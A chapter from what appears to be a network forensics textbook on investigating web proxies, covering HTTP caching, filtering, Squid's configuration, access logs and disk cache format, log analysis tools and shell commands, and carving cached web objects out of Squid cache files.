Chapter 10. Web Proxies

Search in book...
Toggle Font Controls
Create new playlist

Name your new playlist

Playlist description (optional)
Sign In

Email address

Password

Forgot Password?

or

Continue with Facebook

Continue with Google
Sign Up

Full Name

Email address

Confirm Email Address

Password

or

Continue with Facebook

Continue with Google

Chapter 10. Web Proxies

“The hardest thing for people to grasp about the Web is that it has no center; any computer (or node, in mathematical terms) can link to any other computer directly, without having to go through a central connection point. They just need to know the rules for communicating.”

—Mark Fischetti, editor of Scientific American¹

1. Larry Greenemeier, “Remembering the Day the World Wide Web Was Born,” Scientific American, March 2009, http://www.scientificamerican.com/article.cfm?id=day-the-web-was-born.

It’s a port-80 world out there (and, to a lesser extent, port 443 as well). As of 2009, web traffic made up approximately 52% of all Internet traffic, and was growing at a rate of 24.76% per year.²

2. Craig Labovitz, “Internet Traffic and Content Consolidation,” 2007, http://www.ietf.org/proceedings/77/slides/plenaryt-4.pdf.

As a result, firewalls, which filter traffic based on Layer 3 and 4 protocol information such as IP address and TCP ports, are no longer sufficient for protecting enterprise perimeters. There has been an explosion of the use of “web proxies” and “web application gateways,” which often include highly specialized Layer 7-aware firewall capabilities designed to inspect and filter web traffic.

Web proxying and caching have become increasingly popular for both filtering traffic and speeding up requests. Even consumer ISPs have latched onto the idea (sometimes using similar techniques to insert ads into pages as they are downloaded).³

3. Sarah Lai Stirland, “In Test, Canadian ISP Splices Itself Into Google Homepage | Threat Level | Wired.com,” Wired.com, December 10, 2007, http://blog.wired.com/27bstroke6/2007/12/canadian-isps-p.html.

Regardless of whether security was a consideration during the original configuration, forensic investigators can take advantage of the granular logs and caches typically retained by web proxies. The rise of content distribution systems and distributed web caches further increases the need for forensic analysts to collect web content from local caches near the target of investigation, since web content is often modified for specific enterprises, geographic regions, device types, or even individual web clients.

10.1 Why Investigate Web Proxies?

Web proxy and cache servers can be gold mines for forensic analysts. A web proxy can literally contain the web browsing history of an entire organization all in one place. When placed at the perimeter of an organization, they often contain the history of all HTTP or HTTPS traffic, including blogs, instant messaging, and web-based email such as Gmail and Yahoo! accounts. Web caching servers may also contain copies of pages themselves, for a limited time.

This is great for forensic analysts. Investigators can examine web browsing histories for everyone in an organization all at once. Moreover, it’s possible to reconstruct web pages from the cache. Too often, investigators simply visit web sites in order to see what they are. This has some serious drawbacks: first, there is no guarantee you’re seeing what the end-user saw earlier and, second, your surfing now appears in the destination server’s activity logs. If the owner of the server is an attacker or suspect, you may well have just tipped them off. It’s much better to first examine the web cache to see what you can find stored locally.

Web proxies evolved and matured for two general reasons: performance and security. There are many types of web proxies. Below are some simple examples (there are a wide spectrum of products that incorporate different aspects of each of these):

• Caching proxy—Stores previously used pages to speed up performance.

• Content filter—Inspects the content of web traffic and filters based on keywords, presence of malware, or other factors.

• TLS/SSL proxy—Intercepts web traffic at the session layer to inspect the content of TLS/SSL-encrypted web traffic.

• Anonymizing proxy—Acts as an intermediary to protect the identities of web surfers.

• Reverse proxy—Provides content inspection and filtering of inbound web requests from the Internet to the web server.

Nowadays, web proxies are commonly set up to process all outbound web requests from within organizations to the Internet (sometimes referred to as a “forward proxy”). In this setup, the web proxy is often configured to provide caching, content inspection, and filtering of both outbound requests and inbound replies. This has a number of benefits. The web proxy can identify and filter out suspicious or inappropriate web sites and content. Web proxies also cache commonly used pages, which improves performance by removing the need for commonly accessed external content to be fetched anew every time it is requested. In much the same way as individual web browsers cache content to improve performance for a single client, web proxies cache content for use across the enterprise.

Reverse web proxies can be useful as well. Often, they include logs that allow investigators to identify suspicious requests and source IP addresses associated with web-based attacks against the protected server.

Web proxies are typically involved in investigations for one of several reasons:

• A user on the internal network is suspected of violating web browsing policy.

• An internal system has been compromised or may have downloaded malicious content via the web.

• There is concern that proprietary data may have been leaked through web-based exportation.

• A web server protected by a reverse web proxy is under attack or has been hacked.

• The web proxy itself has been hacked (rare).

Throughout this chapter, we focus on analyzing “forward” web proxies, as they are commonly used in organizations. Many of the forensic techniques used to analyze forward web proxies can also be applied to other types of web proxies in different settings (with the special exception of anonymizing proxies, since these are typically designed to retain very little or no information about the endpoints).

10.2 Web Proxy Functionality

Over time, web proxies have evolved standard functions, including:

• Caching—Locally storing web objects for limited amounts of time and serving them in response to client web requests to improve performance.

• URI Filtering—Filtering web requests from clients in real-time according to a blacklist, whitelist, keywords, or other methods.

• Content Filtering—Dynamically reconstructing and filtering content of web requests and responses based on keywords, antivirus scan results, or other methods.

• Distributed Caching—Caching web pages in a distributed hierarchy consisting of multiple caching web proxies in order to provide locally customized web content, serve advertisements, and improve performance.

We discuss each of these in turn.

10.2.1 Caching

Caching is a way of reusing data to reduce bandwidth use and load on web servers, and speed up web application performance from the end-user perspective. The web is designed as a network-based client-server model. In the simplest case, each web client request would be sent directly to the web server, which would then process the request and return data directly to the web client.

Of course, most web servers host a lot of static data that doesn’t change very often. Individual web clients often make requests for data that they have requested before. Organizations may have many web clients on their internal network making requests for data that has already been retrieved by another internal web client. Over time, the Internet community has evolved and standardized mechanisms for making web usage far more efficient by caching web server data locally and in distributed cache proxies.

Forensic investigators examining hard drives know that web pages are often cached locally by web browsers themselves, and can be retrieved through standard hard drive analysis techniques. Network forensic investigators should also be aware that web pages are often cached at the perimeters of organizations, as well as by ISPs and distributed cache proxies, and may be retrieved through analysis of web proxy servers. Client web activity may also be logged in these locations.

The HTTP protocol includes built-in mechanisms to facilitate caching that have matured over time. According to RFC 2616 (“Hypertext Transfer Protocol—HTTP/1.1”), “The goal of caching in HTTP/1.1 is to eliminate the need to send requests in many cases, and to eliminate the need to send full responses in many other cases. The former reduces the number of network round-trips required for many operations; we use an ‘expiration’ mechanism for this purpose.... The latter reduces network bandwidth requirements; we use a ‘validation’ mechanism for this purpose.”⁴

4. R. Fielding, “RFC 2616—Hypertext Transfer Protocol—HTTP/1.1,” IETF, June 1999, http://www.rfc-editor.org/rfc/rfc2616.txt.

Expiration and validation mechanisms are important for forensic investigators to understand because they can indicate, among other things:

• How recently a cached web object was retrieved from the server

• Whether a web object is likely to exist in the web proxy cache

• Whether a cached version of a web object was actually viewed by a specific web client

10.2.1.1 Expiration

The HTTP protocol is designed to reduce the need for web clients and proxies to make requests of web servers by providing an “expiration model” by which web servers may indicate the length of time that a page is “fresh.” While an object is “fresh,” caching web proxies may serve cached copies of the page to web clients instead of making a new request to the origin web server. This can dramatically reduce the amount of bandwidth used by an organization, and the end-user typically receives the locally cached response far more quickly than a response that must be retrieved from a remote network. When the expiration time of a web object has passed, the page is considered “stale.”

The expiration model is typically implemented through one of two mechanisms:

• Expires header—The “Expires” header lists the date and time after which the object will be considered stale. Although this is a straightforward mechanism for indicating page expiration, implementation can be tricky because the client and server dates and times must be synchronized in order for this to work as designed.

• Cache-Control—As of HTTP/1.1, the “Cache-Control” field supports granular specifications for caching, including a “max-age” directive that allows the web server to specify the length of time for which a response is valid. The max-age directive is defined as a number of seconds that the response is valid after receipt, so it does not require that the absolute time between the web server and caching proxy/local system be synchronized.

10.2.1.2 Validation

The “validation model,” as defined by RFC 2616, allows caching web proxies and web clients to make requests of the origin web server to determine whether locally cached copies of web objects may still be used. While the proxy and/or local client still needs to contact the server in this case, the server may not need to send a full response, again improving web application performance and reducing bandwidth and load on central servers.

In order to support validation, web servers generate a “cache validator,” which it attaches to each response. Web proxies and clients then provide the cache validator in subsequent requests, and if the web server responds that the object is still “valid” (i.e., using a 304 “Not Modified” HTTP status code), then the locally cached copy is used.

Common cache validators include:

• Last-Modified header—The “Last-Modified” HTTP header is used as a simple cache validation mechanism based on an absolute date. The web proxy/client sends the server the most recent “Last-Modified” header, and if the object has not been modified since that date, it is considered valid.

• Entity Tag (ETag)—An ETag is a unique value assigned by the web server to a web object located at a specific URI. The mechanism for assigning an ETag value is not specified by a standard and varies depending on the web server. Often, the ETag is based on a cryptographic hash of the web object, such as an MD5sum, which by definition is changed whenever the web object is modified. ETags are sometimes also generated from the last modified date and time, a random number, or a revision number. “Strong” ETag values indicate that the cached web object is bit-for-bit identical to the copy on the server, while “weak” ETag values indicate that the cached web object is semantically equivalent, although it may not be an exact bit-for-bit copy.

10.2.2 URI Filtering

In many organizations, web proxies are set up in order to restrict and log web surfing activity. Quite often, enterprises limit web requests to a list of known “good” web sites (“whitelisting”) or prevent users from visiting known “bad” web sites (“blacklisting”). This is generally done in order to comply with acceptable use policies, preserve bandwidth, or improve employee productivity.

The process of maintaining whitelists is fairly straightforward, but in many organizations employees need to access a wide range of web sites in order to do their jobs, and so restricting web surfing activity to a whitelist is not practical. On the flip side, maintaining blacklists can be quite complex, since it requires that administrators maintain long and constantly changing lists of known “bad” web sites. However, blacklists provide more flexibility and there are published and commercially available blacklists that can ease local administrators’ burdens. URI filtering can also be conducted based on keywords present in the URI.

HR violations, including inappropriate web surfing, are among the most common reasons for network forensic investigations. As a result, forensic investigators may often be called upon to review web activity access logs and provide recommendations for implementing blacklists/whitelists.

Tools such as squidGuard allow administrators to incorporate blacklist/whitelist technology into web proxies.

10.2.3 Content Filtering

As the web becomes more dynamic and complex, transparent web proxies are increasingly used to filter web content. This is especially important because over the past decade, client-side attacks have risen to epidemic proportions, and a large number of system compromises occur through the web.

Content filters are often used to dynamically scan web objects for viruses and malware. In addition, they can filter web responses for inappropriate content based on content keywords or tags in HTTP metadata. Content filters can also be used to filter outbound web traffic, such as HTTP POSTs in order to detect proprietary data leaks or exposure of confidential data (such as Social Security numbers).

10.2.4 Distributed Caching

Increasingly, web providers are relying on distributed hierarchies of caching web proxies to provide web content to clients. Distributed web caching has many benefits for performance, profitability, and functionality. Using a distributed caching system, web providers can reduce the load on central servers, improve performance by storing web content closer to the endpoints, dynamically serve advertisements, and customize web pages based on geographic location or user interests.

The two most commonly used protocols underlying distributed web caches are Internet Cache Protocol and Internet Content Adaptation Protocol.

10.2.4.1 Internet Cache Protocol (ICP)

The Internet Cache Protocol (ICP) is a mechanism for communication between web cache servers in a distributed web cache hierarchy.⁵ Developed in the mid-late 1990s, the purpose of ICP was to further capitalize on the performance gains resulting from web caches by allowing networks of web cache servers to communicate and request cached web content from “parent” and “sibling” web caches. ICP typically transported over UDP since requests and responses must occur extremely quickly in order to be useful.⁶

5. D. Wessels and K. Claffy, “Internet Cache Protocol (ICP), version 2,” IETF, September 1997, http://icp.ircache.net/rfc2186.txt.

6. D. Wessels and K. Claffy, “Application of Internet Cache Protocol (ICP), version 2,” IETF, September 1997, http://icp.ircache.net/rfc2187.txt.

ICP is supported by Squid and the BlueCoat ProxySG, among other popular web proxies.⁷

7. D. Wessels, “ICP—Internet Cache Protocol,” June 16, 2003, http://icp.ircache.net/.

10.2.4.2 Internet Content Adaptation Protocol (ICAP)

The Internet Content Adaptation Protocol (ICAP) is designed to support distributed cache proxies which can transparently filter and modify requests and responses. ICAP is used to translate web pages into local languages, dynamically insert advertisements into web pages, scan web objects for viruses and malware, censor web responses, and filter web requests. As described in RFC 3507, “ICAP clients ... pass HTTP messages to ICAP servers for some sort of transformation or other processing (‘adaptation’). The server executes its transformation service on messages and sends back responses to the client, usually with modified messages. The adapted messages may be either HTTP requests or HTTP responses.”⁸

8. J. Elson and A. Cerpa, “RFC 3507—Internet Content Adaptation Protocol (ICAP),” IETF, April 2003, http://rfc-editor.org/rfc/rfc3507.txt.

ICAP reduces the load on central servers, allowing content providers to distribute resource-intensive operations across multiple servers. ICAP also enables content providers, ISPs, and local enterprises to more easily customize web content for local use, and selectively cache customized content “closer” to endpoints, realizing performance improvements.

ICAP, and similar protocols (such as the Open Pluggable Edge Services [OPES]⁹), have enormous implications for practitioners of web forensics. It is simply no longer the case that a forensic analyst can actively visit a URL and expect to receive the same data that an end-user viewed at an earlier date, with a different device, or from a different network location. To recover the best possible evidence, it is always best to retrieve cached web data as close as possible to the target of investigation. For example, if a cached web page is not available on a local hard drive, the next best option may be the enterprise’s caching web proxy, followed by the local ISP’s caching web proxy.

9. S. Floyd and L. Daigle, “RFC 3238—IAB Architectural and Policy Considerations for Open Pluggable Edge Services,” IETF, January 2002, http://rfc-editor.org/rfc/rfc3238.txt.

10.3 Evidence

Web proxies tend to include substantially more persistent storage than less specialized firewalls. They are often marketed to provide “visibility” into web surfing behaviors and, as a result, store detailed web access logs, and may even provide reports categorizing user web traffic by type (i.e., “adult,” “gambling,” “sports,” “IT,” “hacking,” etc.).

Many web proxies are distributed as software platforms to be installed on top of general-purpose operating systems (such as the open-source Squid web proxy). When distributed as a standalone appliance, web proxies tend to include internal hard drives and RAM comparable to the standard enterprise server models on the market. Unlike more generic firewalls, standalone web proxy appliances typically do not involve specialized hardware such as chips that implement TCP; web protocols are too complex for hardware implementation to be widely available. Furthermore, the latency introduced over a WAN typically far exceeds the minor latency introduced by a web proxy at the enterprise perimeter. As a result, even commercial web proxies sold as standalone appliances are commonly built using enterprise-grade commodity hardware.

10.3.1 Types of Evidence

This section lists the types of evidence that you may find stored on web proxies, categorized by expected level of volatility.

10.3.1.1 Persistent

• History of all HTTP or HTTPS traffic, including blogs, IM, web mail, etc. Volatility varies based on storage space, level of web activity, and configuration options. Web access logs tend to be stored on disk for significant periods of time. Often, system administrators do not realize the length of time or granularity of the data that is cached, and years’ worth of web history can accumulate without notice.

• Blocked web traffic attempts

• Summarized user activity reports

• Web proxy configuration files

10.3.1.2 Volatile

• Cached content of web traffic stored in RAM.

• Cached content of web traffic stored on disk. Although evidence stored to disk is generally much less volatile than data stored in RAM, cached web content is designed to be removed from disk storage as needed. Web cache content tends to be highly volatile, even when it is written to disk, and it may be swapped out quickly due to space considerations. In some cases it may only remain on disk for hours, minutes, or even seconds. Volatility varies based on storage space, level of web activity, and configuration options.

• Authentication information for web sites.

10.3.1.3 Off-System

Web proxies may be configured to send system access logs, web surfing histories, and other records to a central log server. (This generally does not include cached content, which tends to take up a large amount of disk space.) In some cases, large organizations may have a fleet of web proxies managed via a central console, with centralized logging and reporting.

10.3.2 Obtaining Evidence

Web proxies often run on top of general-purpose operating systems, or versions of general-purpose operating systems that have been customized by a vendor. As a result, in many cases, the access options are similar to any general-purpose operating system, with the common addition of a web interface and/or propietary interface as well.

As forensic investigators, you may have the ability to collect:

• Log files stored on the web proxy server or a logging server

• Web cache files stored on the web proxy server

• Reports from tools built into the web proxy server

Given the wide range of web proxies in production use, it is common for forensic investigators to be challenged with an unfamiliar product. Be up-front when you encounter a new product and do not hesitate to rely on local system administrators and/or product vendors for product-specific guidance when needed. Often, network forensic investigators work very closely with network and system administrators to locate evidence and ensure the stability of production systems during evidence collection and preservation.

Whenever possible, it is best to preserve the raw log files and web cache for later analysis. These may not always be easily accessible, depending on the product and the local system configuration. Some commercial products include a built-in web or proprietary interface, which generates reports based on web proxy log data. If this is your best source of evidence, by all means, leverage it.

10.4 Squid

Let’s take a closer look at a popular proxy server and web cache tool, Squid. Squid is an open-source web proxy, originally funded by a grant from the National Science Foundation,¹⁰ and currently released as free software under the GNU GPL. It is used in commercial organizations, universities, government, and many other environments to reduce bandwidth usage, improve web surfing performance, filter traffic, protect end-users, and log web surfing activity.

10. “IRCache Home,” 1999, http://www.ircache.net/.

From a forensic perspective, there are three important components of Squid:

• Configuration: Squid is configured using a file that is by default called “squid.conf.” Other configuration files may be included by reference.

• Logfiles: Squid is capable of storing several types of logfiles, including access.log (a record of web access history), squid.out (maintains startup times and fatal errors), cache.log (program debugging and error messages), store.log (a list of all objects stored to disk or removed), and useragent.log (information about client browsers).

• Cache: Squid also stores copies of web objects themselves, for a limited time. Typically, the cache is stored in /var/spool/squid/.

10.4.1 Squid Configuration

The Squid web proxy configuration file is highly customizable, and includes a wide range of options divided into categories. These include authentication options, access control lists, HTTP options, ICP options, disk and memory cache configuration and tuning, logfile formatting, and more.¹¹

11. “Squid Configuration Devices,” Squid-Cache, June 5, 2011, http://www.squid-cache.org/Doc/config/.

The Squid configuration file(s) can help forensic investigators determine, among other things:

• Which clients are allowed to browse the Internet or specific web sites

• What traffic is processed by the web proxy

• What restrictions exist for user web access

• How easily the web proxy can be circumvented

• What types of objects may exist in the cache (both on disk and in memory)

• The location of the cache and log files

• The storage format of the disk cache

• How long objects may be stored in the cache, and what algorithms are used to purge data

• What data is stored in the log files

In addition, the Squid configuration file can allow investigators to modify web proxy settings in order to collect more evidence in the future. For example, investigators may wish to add details to the web proxy access logs or increase the size of the cache on disk.

10.4.2 Squid Access Logfile

Squid’s “access” logfile is extremely important for forensic investigators and network administrators alike. The access logfile keeps a history of client web requests. Although the contents are highly customizable, by default Squid’s “native” access logfile format is as follows:¹²

12. “Features/LogFormat—Squid Web Proxy Wiki,” June 10, 2010, http://wiki.squid-cache.org/Features/LogFormat.

time elapsed remotehost code/status bytes method URL rfc931 peerstatus/
peerhost type

Investigators can use the “native” Squid access logfile to retrieve a list of clients, corresponding web requests, the date and time of each request, the HTTP status code, and the number of bytes downloaded (as well as the Squid status code, which indicates whether or not the object was current and in the local cache). Note that by default the time is printed in UNIX epoch time (seconds since January 1, 1970, 00:00:00).

Figure 10-1 shows an example of Squid’s access log file, configured to use Squid’s native log format.

Figure 10-1 Squid’s access log (native format).

10.4.3 Squid Cache

Squid stores copies of web objects locally, and provides these cached copies in response to subsequent requests in order to improve performance. The Squid disk cache is a hierarchy of files stored locally on the caching web proxy that contain the cached web objects.

Squid selects web objects for disk storage based on web server directives (such as Content-Control values), HTTP status codes, and local web proxy configuration. Normally, web server responses with the following HTTP status codes may be cached:¹³

13. “SquidFaq/InnerWorkings—Squid Web Proxy Wiki,” April 8, 2009, http://wiki.squid-cache.org/SquidFaq/InnerWorkings.

200 OK
203 Non-Authoritative Information
300 Multiple Choices
301 Moved Permanently
410 Gone

10.4.3.1 Disk Cache

Each Squid proxy can store cached objects in one or more cache directories. Typically, there is only one cache directory on each partition, although this is customizable (see the “cache_dir” directive in the Squid configuration file). Squid supports a variety of cache directory storage formats. The traditional, default format is “ufs,” which we will use as the basis for the remainder of this chapter.¹⁴

14. “7.1 The cache_dir Directive: Disk Cache Basics,” Etutorials, 2011, http://etutorials.org/Server+Administration/Squid.+The+definitive+guide/Chapter+7.+Disk+Cache+Basics/7.1+The+cache_dir+Directive/.

The length of time that cached web objects are stored on disk depends on Squid’s specific configuration and usage. Squid uses a “least-recently-used” (LRU) algorithm to select objects from the cache for removal and replacement. The system administrator can set low and high marks for disk usage (by default these are 90% and 95% respectively), and a routine process runs by default once per second to clear disk space as needed. Each time a cache object is accessed, the associated metadata is updated with a corresponding value indicating the last accessed time. Based on this algorithm, higher web proxy use tends to lead to web objects being stored for a shorter time in the disk cache. According to the Squid web proxy documentation, “Ideally, your cache will have an LRU age value in the range of at least 3 days. If the LRU age is lower than 3 days, then your cache is probably not big enough to handle the volume of requests it receives.”¹⁵

15. “SquidFaq/InnerWorkings—Squid Web Proxy Wiki,” April 8, 2009, http://wiki.squid-cache.org/SquidFaq/InnerWorkings.

10.4.3.2 swap.state

The swap.state file is Squid’s database, which contains a record of every object that has been added to or removed from the cache.¹⁶ This is a binary file that Squid reads on startup to rebuild its indexes in memory in order to facilitate object retrieval. (Forensic investigators may also be able to retrieve cache index information from system RAM.) If the swap.state file is deleted while Squid isn’t running, Squid will actually recreate it the next time it starts up. By default, the swap.state file is stored in the top level of the corresponding cache directory.¹⁷

16. “ProgrammingGuide/FileFormats—Squid Web Proxy Wiki,” May 18, 2008, http://wiki.squid-cache.org/ProgrammingGuide/FileFormats.

17. “13.6 swap.state: Log Files,” Etutorials, 2011, http://etutorials.org/Server+Administration/Squid.+The+definitive+guide/Chapter+13.+Log+Files/13.6+swap.state/.

10.4.3.3 Keys

Squid assigns a database key to each cached web object. The key is a cryptographic hash (currently a 128-bit MD5 sum) of the URL prepended with an 8-bit code that corresponds with the HTTP method used to request it.

Supported HTTP methods and corresponding numbers are as follows:¹⁸

18. Martin Hamilton, “Cache Digest Specification—Version 5,” December 1998, http://www.squid-cache.org/CacheDigest/cache-digest-v5.txt.

METHOD    Hex Value
  GET       0x01
  POST      0x02
  PUT       0x03
  HEAD      0x04
  CONNECT   0x05
  TRACE     0x06
  PURGE     0x07

As an example, here is the calculation for the key of the web site “http://lmgsecurity.com/” retrieved using an HTTP GET request (the top line is ASCII, and the line below is hexadecimal):

GET h t t p : / / l m g s e c u r i t y . c o m /
01 68 74 74 70 3A 2F 2F 6C 6D 67 73 65 63 75 72 69 74 79 2E 63 6F 6D 2F

Key (MD5 digest): 7bb31ba8a860e88d4e712dc81f7e9385

You will find the key in Squid’s swap.state and store.log files, as well as in the metadata of each cached web object. Note that Squid differentiates between public and private keys; in this content, the private key is associated only with requests from a single client, whereas web objects marked with a public key may be served to any client. This allows Squid to effectively handle cached objects that may be protected by authentication or contain private data that should only be viewed by a specific client.¹⁹

19. “SquidFaq/InnerWorkings—Squid Web Proxy Wiki,” Squid-Cache, 2011, http://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_are_private_and_public_keys.3F.

10.4.3.4 Memory Cache

Since it is faster to read pages from memory than from disk, Squid also maintains a limited subset of cached pages in memory. As a result, forensic investigators may be able to retrieve a limited number of volatile cached web objects from the web proxy’s RAM. The amount of RAM dedicated to this purpose is configurable using the “cache_mem” line in the Squid configuration file.²⁰

20. “Appendix B.: The Memory Cache,” Etutorials, 2011, http://etutorials.org/Server+Administration/Squid.+The+definitive+guide/Appendix+B.+The+Memory+Cache/.

10.5 Web Proxy Analysis

Forensic analysis of web proxies is a new art. Web proxy access logs contain records of browsing histories, often for an entire organization. This can allow an investigator to build very detailed profiles of user activities and interests and correlate activity across a large population of end-users. Access log data takes up very little space and is easy to store. Organizations may store years’ worth of web proxy access logs, without even realizing it. These logs can be analyzed using general-purpose event log analysis tools or with specialized open-source and commercial tools.

On the flip side, extracting objects from web proxy caches is challenging, and the evidence is very volatile. Cache formats are not well documented (in proprietary web proxies, they are deliberately unpublished). Due to the large disk space necessary to cache web objects, they are typically not retained on disk for very long, although this varies depending on the web proxy configuration, capacity, and network activity. Not many tools exist to faciliate extraction of cached objects, although that is beginning to change.

In this section, we review common tools available for analyzing web proxy log data, and then show you an example of web proxy cache analysis.

10.5.1 Web Proxy Log Analysis Tools

Forensic investigators can analyze most web proxy logs using common log analysis tools such as Linux command-line tools, Splunk, and others. There are also many open-source and commercially available tools that exist specifically to analyze and produce reports for web proxy log data. These include Internet Access Monitor, Blue Coat Reporter, squidview, and SARG, among others.

10.5.1.1 Internet Access Monitor

Internet Access Monitor²¹ is a commercial tool by Red Line Software. It accepts logs from a wide variety of web proxy servers, including Squid, Microsoft’s ISA, Novell BorderManager, and others.

21. “Internet Access Monitor,” Red Line Software, 2011, http://www.redline-software.com/eng/products/iam.

10.5.1.2 Blue Coat Reporter

The Blue Coat Reporter is another commercial tool, designed specifically to produce visual reports for Blue Coat products, such as the ProxySG, WebFilter, ProxyClient, and ProxyAV.

10.5.1.3 Squidview

Squidview is an open-source, interactive Squid access log analysis tool.²² You can use it to analyze saved log files or to view the access log in real-time (squidview will show activity updates every 3 seconds by default). Figure 10-2 shows an example of squidview use.

22. “squidview,” May 30, 2011, http://www.rillion.net/squidview/.

Figure 10-2 Squidview.

10.5.1.4 SARG

The Squid Analysis Report Generator (SARG) is a web-based Squid analysis tool that allows you to browse visual reports of user activity based on Squid’s access log (SARG also supports log formats from Microsoft ISA and Novell Border Manager).²³ SARG can also supplement reports with additional information from web filtering logs, such as those generated by squidGuard. Figure 10-3 shows an example of a SARG activity graph for one client during a set time period.

23. “SARG,” 2011, http://sarg.sourceforge.net/sarg.php.

Figure 10-3 A screenshot of SARG, showing the browsing history of 192.168.1.170.

10.5.1.5 Splunk

You can also use Splunk to analyze web proxy access. One nice thing about using Splunk for this purpose is that it automatically translates the UNIX timestamps from common logfiles such as Squid’s access.log into human-readable format. It also allows you to graphically examine a client’s web surfing history and filter on any keyword in the logs (such as an IP address or URI). Figure 10-4 shows a simple example in which Splunk is used to display Squid’s access logfile.

Figure 10-4 A simple example in which Splunk is used to display Squid’s access log.

Please see Chapter 8, “Event Log Aggregation, Correlation, and Analysis,” for more details about Splunk.

10.5.1.6 Shell

Linux command-line tools such as grep, sort, and awk can be very helpful when analyzing Squid’s access.log file.

• You can extract logs relating to a specific IP address using “grep”:

$ grep '192.168.1.4|192.168.10.42' access.log

This command extracts all lines that contain EITHER “192.168.1.4” or “192.168.10.42” from the file access.log. It is often handy for investigators to see timestamps in human-readable format, rather than solely UNIX timestamps.

• You can convert UNIX timestamps to human-readable format using the following command:

$ date -d @1239739126.845
Tue Apr 14 13:58:46 MDT 2009

• Here’s one way to append a column of human-readable dates before the UNIX timestamps, and save the modified file as access-humandate.log:

$ while read line; do unixdate=`echo $line | awk '{print $1
}'`; humandate=`date -d @$unixdate`; echo $humandate $line;
done< access.log > access-humandate.log

• You can also create a file that contains the bare minimal information: the human-readable dates, source IP address, and the associated URIs.

$ awk '{printf"%s %s %s %s %s %s - %s - %s ", $1, $2, $3,
$4, $5, $6, $9, $13 }' access.log > basic-access.log

10.5.2 Example: Dissecting a Squid Disk Cache

If you simply list the directory contents of a ufs Squid disk cache, here is what you will see:

$ ls
00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F swap.state

Within each of those subdirectories are files such as these:

$ ls 00/
00  10  20  30  40  50  60  70  80  90  A0  B0  C0  D0  E0  F0
01  11  21  31  41  51  61  71  81  91  A1  B1  C1  D1  E1  F1
02  12  22  32  42  52  62  72  82  92  A2  B2  C2  D2  E2  F2
03  13  23  33  43  53  63  73  83  93  A3  B3  C3  D3  E3  F3
04  14  24  34  44  54  64  74  84  94  A4  B4  C4  D4  E4  F4
05  15  25  35  45  55  65  75  85  95  A5  B5  C5  D5  E5  F5
06  16  26  36  46  56  66  76  86  96  A6  B6  C6  D6  E6  F6
07  17  27  37  47  57  67  77  87  97  A7  B7  C7  D7  E7  F7
08  18  28  38  48  58  68  78  88  98  A8  B8  C8  D8  E8  F8
09  19  29  39  49  59  69  79  89  99  A9  B9  C9  D9  E9  F9
0A  1A  2A  3A  4A  5A  6A  7A  8A  9A  AA  BA  CA  DA  EA  FA
0B  1B  2B  3B  4B  5B  6B  7B  8B  9B  AB  BB  CB  DB  EB  FB
0C  1C  2C  3C  4C  5C  6C  7C  8C  9C  AC  BC  CC  DC  EC  FC
0D  1D  2D  3D  4D  5D  6D  7D  8D  9D  AD  BD  CD  DD  ED  FD
0E  1E  2E  3E  4E  5E  6E  7E  8E  9E  AE  BE  CE  DE  EE  FE
0F  1F  2F  3F  4F  5F  6F  7F  8F  9F  AF  BF  CF  DF  EF  FF

And each of those subdirectories contains files such as these:

$ ls 00/00/
00000001  0000002C  00000058  00000083  000000AE  000000DA
00000002  0000002D  00000059  00000084  000000AF  000000DB
00000003  0000002E  0000005A  00000085  000000B0  000000DC
00000004  0000002F  0000005B  00000086  000000B1  000000DD
00000005  00000030  0000005C  00000087  000000B2  000000DE
00000006  00000031  0000005D  00000088  000000B3  000000DF
00000007  00000032  0000005E  00000089  000000B4  000000E0
00000008  00000033  0000005F  0000008A  000000B5  000000E1
00000009  00000034  00000060  0000008B  000000B6  000000E2
0000000A  00000035  00000061  0000008C  000000B7  000000E3
0000000B  00000036  00000062  0000008D  000000B8  000000E4
...

Finally, each of those eight-character files contains—yes!—the object actually cached by Squid, along with Squid metadata and HTTP headers. Each disk file includes a Squid header with metadata, followed by the HTTP response (headers and body). The Squid metadata includes the URI requested as well as the database key and other information.

10.5.2.1 Extracting a Cached Web Object

To extract a web object from the Squid cache, first locate the cache file of interest. You can do this in a variety of ways, depending on the information you have available. For example, if you have identified a URI of interest from Squid’s access log file, you can use standard UNIX/Linux shell commands to list files in the Squid cache directory that contain that URI. (To make your search more specific, you can calculate the key using the HTTP method and URL listed in the access log, and search for web objects that contain the key.)

Once you have identified your cached object of interest, you can extract the original web object by removing the Squid metadata and HTTP headers prepended to the top of the file. Figure 10-5 shows an example of a page stored in the Squid disk cache, viewed using the “less” command. Notice the binary metadata at the top of the file (which includes the web object URI), followed by the original HTTP response headers received from the web server. The HTTP response headers provide us with a range of useful information about the web object and server. In particular, note the “Content-Type” header, which indicates that the cached web object is “text/html.”

Figure 10-5 A cached Squid object, viewed using “less.”

According to the HTTP/1.1 protocol specifications (RFC 2616) shown below,²⁴ the HTTP message body will always be immediately preceded by TWO carriage-return/linefeeds (CRLF). In hexadecimal, a carriage return is “0x0D” and a linefeed is “0x0A.”

24. “RFC 2616—Hypertext Transfer Protocol—HTTP/1.1.”

After receiving and interpreting a request message, a server responds
with an HTTP response message.

    Response      = Status-Line               ; Section 6.1
                    *(( general-header        ; Section 4.5
                     | response-header        ; Section 6.2
                     | entity-header ) CRLF) ; Section 7.1
                    CRLF
                    [ message-body ]          ; Section 7.2

Note that the “Status-Line” in the response always ends with a CRLF, so even in the relatively rare case that there are no headers, the message body will still be immediately preceded by two CRLFs.

This means that to carve out the message body in the HTTP response, we need to look for the first instance of two CRLFs (0x0D0A0D0A). Sometimes this may include more than two CRLF sequences in a row, in which case, you will normally want to trim the entire block. Figure 10-6 shows an example of a page stored in the Squid disk cache, viewed using the Bless hex editor. To carve out the message body, cut all bytes through the “0x0D0A0D0A” marker, as shown in Figure 10-6. Notice that the CRLF characters are immediately followed by an appropriate HTML header, <!DOCTYPE html PUBLIC “-//W3C//DTD HTML 4.01//EN”>, confirming that we have correctly found the beginning of the message body.

Figure 10-6 A cached Squid object, viewed using the Bless hex editor.

Once the HTTP response message body is carved out, we can analyze the web object using native viewers, as we would for usual filesystem forensics. Figure 10-7 shows an example of the extracted web object, viewed using “less.” In the source, there is a referral to the image file lolcatsdotcomvz4o71odbkla2v24.jpg. We’ll come back to that.

Figure 10-7 An extracted text/html web object, viewed using “less”.

